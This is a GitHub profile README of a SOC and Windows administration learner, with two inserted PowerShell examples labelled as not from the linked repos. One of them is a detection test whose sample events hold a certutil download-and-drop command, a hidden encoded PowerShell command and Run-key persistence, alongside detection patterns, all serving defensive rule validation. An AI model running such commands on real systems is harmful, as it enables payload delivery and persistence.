Niraj-Bathani/README.md

Hi, I'm Niraj Bathani

Windows & SOC Operations Focused | Splunk, Wazuh, QRadar | Detection Engineering | Incident Response | Active Directory & Windows Infrastructure

I build hands-on cybersecurity and enterprise infrastructure labs focused on:

  • SIEM monitoring and detection engineering
  • Windows enterprise administration
  • Incident investigation and troubleshooting
  • Active Directory and Group Policy operations
  • Log analysis and operational validation
  • Blue-team workflows using real telemetry

My projects are designed to simulate real-world enterprise operations using structured documentation, investigation workflows, and validated lab-generated evidence.


About Me

I am a cybersecurity and Windows infrastructure learner focused on developing practical blue-team and operational administration skills through hands-on lab environments.

My work combines:

  • SIEM monitoring and alert analysis
  • Detection engineering
  • Windows Server administration
  • Active Directory operations
  • Group Policy troubleshooting
  • Incident response documentation
  • DNS and DHCP troubleshooting
  • PowerShell automation
  • Enterprise operational workflows

I focus on learning by building realistic environments, generating real telemetry, validating detections, and documenting investigations using enterprise-style operational standards.


Featured Projects

Enterprise System Administration Operations Lab

Production-style Windows Server administration and incident response lab environment.

Highlights

  • Built a Windows Server 2022 enterprise lab environment
  • Configured:
    • Active Directory
    • DNS
    • DHCP
    • Group Policy
    • SMB file services
    • NTFS permissions
  • Implemented department-based access control using security groups
  • Performed:
    • Client-side troubleshooting
    • Group Policy validation
    • DNS troubleshooting
    • File share investigations
    • Standard-user testing
  • Developed enterprise-style incident response documentation including:
    • Issue reports
    • Diagnosis
    • Root cause analysis
    • Remediation
    • Prevention guidance
    • Lessons learned
  • Created PowerShell operational workflows and validation procedures
  • Captured evidence using:
    • Event Viewer
    • PowerShell transcripts
    • Administrative consoles
    • Client validation screenshots

Technologies

  • Windows Server 2022
  • Active Directory
  • Group Policy
  • DNS / DHCP
  • PowerShell
  • SMB / NTFS Permissions
  • Event Viewer
  • RSAT
  • Windows 10/11
  • Ubuntu Server

🔗 https://github.com/Niraj-Bathani/enterprise-system-admin-ops
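The department-based access control described above, as an added PowerShell example (this is not code from the enterprise-system-admin-ops repo): one global security group per department, an NTFS ACL on the department folder with inheritance removed so that only that group, Administrators and SYSTEM hold access, an SMB share whose own permissions defer to NTFS, and a validation step that flags any principal the design did not intend. The domain NetBIOS name LAB, the OU path, the share root D:\Shares and the "<Department>-Users" naming convention are assumptions; everything else is standard ActiveDirectory, SmbShare and .NET ACL API usage.

```powershell
# Added example, not the repo's own script. Run as a domain admin on the file
# server with the RSAT ActiveDirectory module installed (PowerShell 5.1 or 7).
#Requires -Modules ActiveDirectory
param(
    [string]$Department = 'Finance',
    [string]$GroupOU    = 'OU=Groups,DC=lab,DC=local',   # assumption
    [string]$ShareRoot  = 'D:\Shares',                     # assumption
    [string]$Domain     = 'LAB'                            # assumption
)

$group = "$Department-Users"           # naming convention is an assumption
$path  = Join-Path $ShareRoot $Department

# 1. Global security group, created only if missing (safe to re-run).
if (-not (Get-ADGroup -Filter "Name -eq '$group'")) {
    New-ADGroup -Name $group -GroupScope Global -GroupCategory Security -Path $GroupOU
}

# 2. Department folder.
New-Item -Path $path -ItemType Directory -Force | Out-Null

# 3. NTFS: break inheritance and discard inherited ACEs, so the drive-root
#    'Users: Read' entry can no longer leak into the department data, then
#    grant explicit rights that propagate to subfolders and files.
$acl = Get-Acl -Path $path
$acl.SetAccessRuleProtection($true, $false)   # isProtected, preserveInheritance
$inherit = [System.Security.AccessControl.InheritanceFlags]'ContainerInherit, ObjectInherit'
$prop    = [System.Security.AccessControl.PropagationFlags]::None
$grants  = @(
    @{ Id = "$Domain\$group";         Rights = 'Modify' },
    @{ Id = 'BUILTIN\Administrators'; Rights = 'FullControl' },
    @{ Id = 'NT AUTHORITY\SYSTEM';    Rights = 'FullControl' }
)
foreach ($entry in $grants) {
    $rule = [System.Security.AccessControl.FileSystemAccessRule]::new(
        $entry.Id, $entry.Rights, $inherit, $prop, 'Allow')
    $acl.AddAccessRule($rule)
}
Set-Acl -Path $path -AclObject $acl

# 4. SMB share: broad share permission, NTFS does the real enforcement, so
#    there is exactly one ACL to audit.
if (-not (Get-SmbShare -Name $Department -ErrorAction SilentlyContinue)) {
    New-SmbShare -Name $Department -Path $path -ChangeAccess 'Authenticated Users' | Out-Null
}

# 5. Validation: print the effective ACEs and warn if any principal other than
#    the three intended ones appears (the classic 'Users: Read' leak).
$expected   = @("$Domain\$group", 'BUILTIN\Administrators', 'NT AUTHORITY\SYSTEM')
$aces       = (Get-Acl -Path $path).Access
$unexpected = $aces | Where-Object { $expected -notcontains $_.IdentityReference.Value }
$aces | Format-Table IdentityReference, FileSystemRights, IsInherited -AutoSize
if ($unexpected) {
    Write-Warning "Unexpected principals on ${path}: $($unexpected.IdentityReference.Value -join ', ')"
} else {
    Write-Host "ACL on $path contains only the expected principals."
}
```

The standard-user test that closes the loop is to log on as a member of a different department and browse \\<server>\Finance; the expected result is "Access is denied", and a 5145 (detailed file share) or 4656 (object access) event on the server is the evidence to capture for the issue report.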


Splunk SIEM SOC Lab

Enterprise-style SIEM monitoring and investigation environment using Splunk Enterprise.

Highlights

  • Built a multi-host SIEM environment using Splunk Enterprise
  • Ingested Windows and Linux telemetry
  • Developed detections for:
    • PowerShell abuse
    • Authentication failures
    • Persistence techniques
    • LOLBins (certutil)
  • Investigated simulated attack activity using SPL queries and event evidence
  • Practiced SOC investigation workflows and event correlation

Technologies

  • Splunk Enterprise
  • Windows Event Logs
  • Linux logs
  • Sysmon
  • PowerShell
  • VMware

🔗 https://github.com/Niraj-Bathani/splunk-siem-soc-lab


Wazuh SOC Detection Lab

Detection engineering and alert validation environment using Wazuh SIEM.

Highlights

  • Implemented Wazuh with Windows and Linux agents
  • Generated alerts using rule-based detections
  • Simulated attack scenarios and validated alert generation
  • Practiced SOC alert investigation and triage
  • Documented detection workflows and investigation evidence

Technologies

  • Wazuh
  • Linux
  • Windows
  • Sysmon
  • Event Logs

🔗 https://github.com/Niraj-Bathani/wazuh-soc-detection-lab


QRadar Offense Analysis

SOC-style alert investigation and offense analysis using IBM QRadar.

Highlights

  • Investigated QRadar offenses and authentication alerts
  • Analyzed brute-force login activity
  • Practiced:
    • Alert triage
    • Event correlation
    • Investigation workflows
    • Offense analysis
  • Documented findings and remediation workflows

Technologies

  • IBM QRadar
  • Windows logs
  • Linux logs
  • Authentication events

🔗 https://github.com/Niraj-Bathani/qradar-offense-analysis
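The rule families the three SIEM labs above describe (brute-force authentication failures in the QRadar project; PowerShell abuse, persistence and certutil in the Splunk and Wazuh projects), as one added PowerShell example that is not code from any of the linked repos. It runs the detection logic over a constructed sample of Windows Security 4625 and Sysmon EventID 1 and 13 events so the behaviour can be checked offline before the same logic is written as an SPL search, a Wazuh rule or a QRadar offense rule. The field names follow the real Windows and Sysmon event schemas; the hosts, users, IP addresses, timestamps and paths are made up for the example.

```powershell
# Added example, not code from the splunk-siem-soc-lab, wazuh-soc-detection-lab
# or qradar-offense-analysis repos. Windows PowerShell 5.1 or PowerShell 7.

function New-Ev {
    # Build one event object; field names mirror the Security/Sysmon schemas.
    param([string]$Time, [int]$Id, [hashtable]$Fields)
    $o = [ordered]@{ Time = [datetime]$Time; EventId = $Id }
    foreach ($k in $Fields.Keys) { $o[$k] = $Fields[$k] }
    [pscustomobject]$o
}

# Constructed sample telemetry (all values invented for the example).
$Events = @(
    # Security 4625 burst: one source, one account, six failures in 40 seconds
    (New-Ev '2024-05-01T10:00:00' 4625 @{ TargetUserName='svc_backup'; IpAddress='10.0.0.77'; Status='0xC000006D' })
    (New-Ev '2024-05-01T10:00:08' 4625 @{ TargetUserName='svc_backup'; IpAddress='10.0.0.77'; Status='0xC000006D' })
    (New-Ev '2024-05-01T10:00:15' 4625 @{ TargetUserName='svc_backup'; IpAddress='10.0.0.77'; Status='0xC000006D' })
    (New-Ev '2024-05-01T10:00:23' 4625 @{ TargetUserName='svc_backup'; IpAddress='10.0.0.77'; Status='0xC000006D' })
    (New-Ev '2024-05-01T10:00:31' 4625 @{ TargetUserName='svc_backup'; IpAddress='10.0.0.77'; Status='0xC000006D' })
    (New-Ev '2024-05-01T10:00:40' 4625 @{ TargetUserName='svc_backup'; IpAddress='10.0.0.77'; Status='0xC000006D' })
    # A single wrong password from another host: normal noise, must not alert
    (New-Ev '2024-05-01T10:05:00' 4625 @{ TargetUserName='alice'; IpAddress='10.0.0.12'; Status='0xC000006A' })
    # Sysmon 1: certutil used as a downloader
    (New-Ev '2024-05-01T10:07:12' 1 @{ Image='C:\Windows\System32\certutil.exe'; CommandLine='certutil.exe -urlcache -split -f http://10.0.0.5/update.exe C:\Users\Public\update.exe'; User='LAB\alice' })
    # Sysmon 1: legitimate certutil use (certificate store listing), must not alert
    (New-Ev '2024-05-01T10:07:30' 1 @{ Image='C:\Windows\System32\certutil.exe'; CommandLine='certutil.exe -store My'; User='LAB\admin' })
    # Sysmon 1: encoded PowerShell; the blob is the string "whoami" as UTF-16LE base64
    (New-Ev '2024-05-01T10:08:02' 1 @{ Image='C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; CommandLine='powershell.exe -NoP -W Hidden -enc dwBoAG8AYQBtAGkA'; User='LAB\alice' })
    # Sysmon 13 (registry value set): Run-key persistence
    (New-Ev '2024-05-01T10:08:40' 13 @{ Image='C:\Windows\System32\reg.exe'; TargetObject='HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater'; Details='C:\Users\Public\update.exe'; User='LAB\alice' })
)

function Find-BruteForce {
    # T1110: at least $Threshold 4625s from one source IP inside $WindowMinutes.
    # (Whole-group span rather than a sliding window: good enough for a lab rule.)
    param($Events, [int]$Threshold = 5, [int]$WindowMinutes = 5)
    $Events | Where-Object EventId -eq 4625 | Group-Object IpAddress | ForEach-Object {
        $sorted = @($_.Group | Sort-Object Time)
        $span   = $sorted[-1].Time - $sorted[0].Time
        if ($_.Count -ge $Threshold -and $span.TotalMinutes -le $WindowMinutes) {
            [pscustomobject]@{
                Time = $sorted[0].Time; Rule = 'BruteForce'; Technique = 'T1110'
                IpAddress = $_.Name; Count = $_.Count
                Targets = ($sorted.TargetUserName | Sort-Object -Unique) -join ','
            }
        }
    }
}

function Find-CertutilAbuse {
    # T1105: certutil with download or encode/decode switches; '-store' and friends pass.
    param($Events)
    $Events | Where-Object { $_.EventId -eq 1 -and $_.Image -match '\\certutil\.exe$' -and
                             $_.CommandLine -match '(^|\s)-(urlcache|verifyctl|decode|decodehex|encode)\b' } |
        ForEach-Object { [pscustomobject]@{ Time=$_.Time; Rule='CertutilAbuse'; Technique='T1105'; User=$_.User; CommandLine=$_.CommandLine } }
}

function Find-EncodedPowerShell {
    # T1059.001: -EncodedCommand in any abbreviation; decode the payload for the analyst.
    param($Events)
    $Events | Where-Object { $_.EventId -eq 1 -and $_.Image -match '\\(powershell|pwsh)\.exe$' -and
                             $_.CommandLine -match '\s-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}' } |
        ForEach-Object {
            $null = $_.CommandLine -match '\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})'
            try   { $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) }
            catch { $decoded = '<not valid base64>' }
            [pscustomobject]@{ Time=$_.Time; Rule='EncodedPowerShell'; Technique='T1059.001'; User=$_.User; Decoded=$decoded }
        }
}

function Find-RunKeyPersistence {
    # T1547.001: Sysmon 13 writes under a Run or RunOnce key.
    param($Events)
    $Events | Where-Object { $_.EventId -eq 13 -and $_.TargetObject -match '\\CurrentVersion\\Run(Once)?\\' } |
        ForEach-Object { [pscustomobject]@{ Time=$_.Time; Rule='RunKeyPersistence'; Technique='T1547.001'; User=$_.User; Key=$_.TargetObject; Value=$_.Details } }
}

$alerts = @(Find-BruteForce $Events) + @(Find-CertutilAbuse $Events) +
          @(Find-EncodedPowerShell $Events) + @(Find-RunKeyPersistence $Events)
$alerts | Sort-Object Time | Format-Table Time, Rule, Technique, User, IpAddress, Decoded -AutoSize
```

The sample deliberately pairs each malicious event with a benign look-alike (a single failed logon, a certificate-store query) so the rules are checked for false positives as well as true positives; that is the validation step the labs describe. The brute-force function is the one to translate first into SPL (a `stats count min(_time) max(_time) by src_ip` over EventCode 4625 with a `where count>=5` clause) or a QRadar offense rule, since it is the only one that needs aggregation rather than per-event matching.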


Core Competencies

SOC & Detection Engineering

  • SIEM Monitoring
  • Detection Engineering
  • Alert Triage
  • Event Correlation
  • Incident Investigation
  • MITRE ATT&CK Mapping
  • SPL Query Development

Windows Infrastructure

  • Active Directory
  • Group Policy
  • DNS
  • DHCP
  • Windows Server Administration
  • NTFS & SMB Permissions
  • RSAT Administration

Security Operations

  • Windows Event Log Analysis
  • PowerShell Investigation
  • Authentication Analysis
  • Persistence Detection
  • Reconnaissance Detection
  • Operational Troubleshooting

Automation & Administration

  • PowerShell
  • Administrative Validation
  • System Health Checks
  • Operational Documentation
  • Troubleshooting Runbooks

Tools & Technologies

SIEM & Monitoring

  • Splunk Enterprise
  • Wazuh
  • IBM QRadar

Windows Infrastructure

  • Windows Server 2022
  • Active Directory
  • Group Policy
  • DNS / DHCP
  • Event Viewer
  • RSAT

Security & Detection

  • Sysmon
  • Suricata (basic)
  • Windows Security Logs
  • Linux Authentication Logs

Operating Systems

  • Windows 10/11
  • Ubuntu Server
  • Kali Linux

Virtualization

  • VMware
  • Host-only Networking
  • NAT Networking

Current Focus

I am currently focused on improving:

  • Detection engineering workflows
  • Splunk SPL query development
  • Windows event analysis
  • SOC investigation methodology
  • Active Directory troubleshooting
  • Incident response documentation
  • Sysmon-based detections
  • Operational validation workflows

What I'm Working On Next

  • Expanding detection coverage with new attack scenarios
  • Building SOC investigation playbooks
  • Creating structured detection engineering labs
  • Improving alert correlation workflows
  • Developing PowerShell investigation tooling
  • Exploring advanced Windows logging and Sysmon detections

Goal

My goal is to become a:

  • SOC Analyst
  • SIEM Engineer
  • Detection Engineer
  • Blue-Team Operations Analyst

by building practical, investigation-driven projects that reflect real-world enterprise security operations and Windows infrastructure administration.


Contact

Popular repositories

  1. Niraj-Bathani (Public)

  2. qradar-offense-analysis (Public)

    SOC offense investigation and SIEM triage with IBM QRadar, including brute-force detection and analyst-style incident documentation

    Python

  3. wazuh-soc-detection-lab (Public)

    SOC Detection Engineering & Incident Investigation with Wazuh across Linux and Windows endpoints

    Shell

  4. splunk-siem-soc-lab (Public)

    Splunk-based home SOC lab for Windows and Linux log analysis, detection engineering, and security investigation workflows.

    PowerShell

  5. enterprise-system-admin-ops (Public)

    Production-style Windows Server 2022 administration lab focused on Active Directory, Group Policy, DNS/DHCP, PowerShell automation, file server permissions, and enterprise incident response documen…

    PowerShell

  6. enterprise-linux-admin-ops (Public)

    Enterprise Linux Administration Operations Lab for RHEL 9.6 featuring hands-on labs, troubleshooting scenarios, monitoring workflows, Bash automation scripts, networking diagnostics, storage manage…

    Shell